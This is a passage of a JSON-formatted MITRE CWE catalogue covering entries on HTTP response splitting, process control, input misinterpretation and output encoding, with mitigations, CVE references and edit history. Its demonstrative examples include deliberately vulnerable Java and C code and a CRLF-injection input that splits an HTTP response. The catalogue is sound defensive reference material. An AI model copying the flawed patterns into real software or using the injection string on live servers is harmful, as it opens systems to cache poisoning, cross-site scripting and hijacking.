Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"113":{"attr":{"@_ID":"113","@_Name":"Improper Neutralization of CRLF Sequences in HTTP Headers (\'HTTP Response Splitting\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.","Extended_Description":{"xhtml:p":["Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \\\\r) and LF (line feed, also given by %0a or \\\\n) characters the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning attacks.","HTTP response splitting weaknesses may be present when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters a web application through an untrusted source, most frequently an HTTP request.","The data is included in an HTTP response header sent to a web user without being validated for malicious characters."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"93","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Modify Application Data","Gain Privileges or Assume Identity"],"Note":"CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Construct HTTP headers very carefully, avoiding the use of non-validated input data."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String author = request.getParameter(AUTHOR_PARAM);...Cookie cookie = new Cookie(\\"author\\", author);cookie.setMaxAge(cookieExpiration);response.addCookie(cookie);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Jane Smith...","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"Wiley Hacker\\\\r\\\\nHTTP/1.1 200 OK\\\\r\\\\n"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"HTTP/1.1 200 OK...Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK...","xhtml:br":["","",""]}}],"Body_Text":["Assuming a string consisting of standard alpha-numeric characters, such as \\"Jane Smith\\", is submitted in the request the HTTP response including this cookie might take the following form:","However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as","then the HTTP response would be split into two responses of the following form:","Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"cross-user defacement"},{"xhtml:div":"web and browser cache poisoning"},{"xhtml:div":"cross-site scripting"},{"xhtml:div":"page hijacking"}]}}]},{"Intro_Text":"An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-User Defacement","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server.",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"xhtml:div":"In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application."},{"xhtml:div":"In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker."}]}}]}}},{"Intro_Text":"The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cache Poisoning","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected."]}}},{"Intro_Text":"Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Cross-Site Scripting","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user\'s browser.","The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\'s machine under the guise of the vulnerable site.","The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim\'s account."]}}},{"Intro_Text":"In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead.","Body_Text":{"xhtml:div":{"xhtml:div":[{"#text":"Page Hijacking","attr":{"@_style":"color:#32498D; font-weight:bold;"}},"By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker.","Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker\'s request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker\'s request is already waiting and is interpreted as a response to the victim\'s request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim."]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2146","Description":"Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2146"},{"Reference":"CVE-2004-1620","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1620"},{"Reference":"CVE-2004-1656","Description":"HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1656"},{"Reference":"CVE-2005-2060","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2060"},{"Reference":"CVE-2005-2065","Description":"Bulletin board allows response splitting via CRLF in parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2065"},{"Reference":"CVE-2004-2512","Description":"Response splitting via CRLF in PHPSESSID.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2512"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP response splitting"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":25,"Entry_Name":"HTTP Response Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-43"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31"}}]},"Notes":{"Note":{"#text":"HTTP response splitting is probably only multi-factor in an environment that uses intermediaries.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"HTTP Response Splitting","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (aka \'HTTP Response Splitting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences in HTTP Headers (\'HTTP Response Splitting\')","attr":{"@_Date":"2010-06-21"}}]}},"114":{"attr":{"@_ID":"114","@_Name":"Process Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.","Extended_Description":"Process control vulnerabilities take two forms: 1. An attacker can change the command that the program executes: the attacker explicitly controls what the command is. 2. An attacker can change the environment in which the command executes: the attacker implicitly controls what the command means. Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"73","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Libraries that are loaded should be well understood and come from a trusted source. The application can execute code contained in the native libraries, which often contain calls that are susceptible to other security problems, such as buffer overflows or command injection. All native libraries should be validated to determine if the application requires the use of the library. It is very difficult to determine what these native libraries actually do, and the potential for malicious code is high. In addition, the potential for an inadvertent mistake in these native libraries is also high, as many are written in C or C++ and may be susceptible to buffer overflow or race condition problems. To help prevent buffer overflow attacks, validate all input to native calls for content and length. If the native library does not come from a trusted source, review the source code of the library. The library should be built from the reviewed source before using it."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.loadLibrary(\\"library.dll\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s library.dll will now be run with elevated privileges, possibly giving them complete control of the system."},{"Intro_Text":"The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...RegQueryValueEx(hkey, \\"APPHOME\\",0, 0, (BYTE*)home, &size);char* lib=(char*)malloc(strlen(home)+strlen(INITLIB));if (lib) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"strcpy(lib,home);strcat(lib,INITCMD);LoadLibrary(lib);","xhtml:br":["","",""]}}}},"Body_Text":"The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code."},{"Intro_Text":"The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"LoadLibrary(\\"liberty.dll\\");"},"Body_Text":"The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\SafeDllSearchMode"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Process Control"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"108"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"115":{"attr":{"@_ID":"115","@_Name":"Misinterpretation of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2225","Description":"Product sees dangerous file extension in free text of a group discussion, disconnects all users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2225"},{"Reference":"CVE-2001-0003","Description":"Product does not correctly import and process security settings from another product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0003"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Misinterpretation Error"}},"Notes":{"Note":{"#text":"This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Misinterpretation Error","attr":{"@_Date":"2008-04-11"}}}},"116":{"attr":{"@_ID":"116","@_Name":"Improper Encoding or Escaping of Output","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.","Extended_Description":{"xhtml:p":["Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead.","Most software follows a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, \\"GET /index.html HTTP/1.1\\" is a structured message containing a command (\\"GET\\") with a single argument (\\"/index.html\\") and metadata about which protocol version is being used (\\"HTTP/1.1\\").","If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}},"Technology":[{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Output Sanitization"},{"Term":"Output Validation"},{"Term":"Output Encoding"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":"Execute Unauthorized Code or Commands","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"Moderate","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies."},{"Phase":"Architecture and Design","Description":"In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input."},{"Phase":"Architecture and Design","Description":"Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20)."},{"Phase":"Requirements","Description":"Fully specify which encodings are required by components that will be communicating with each other."},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays an email address that was submitted as part of a 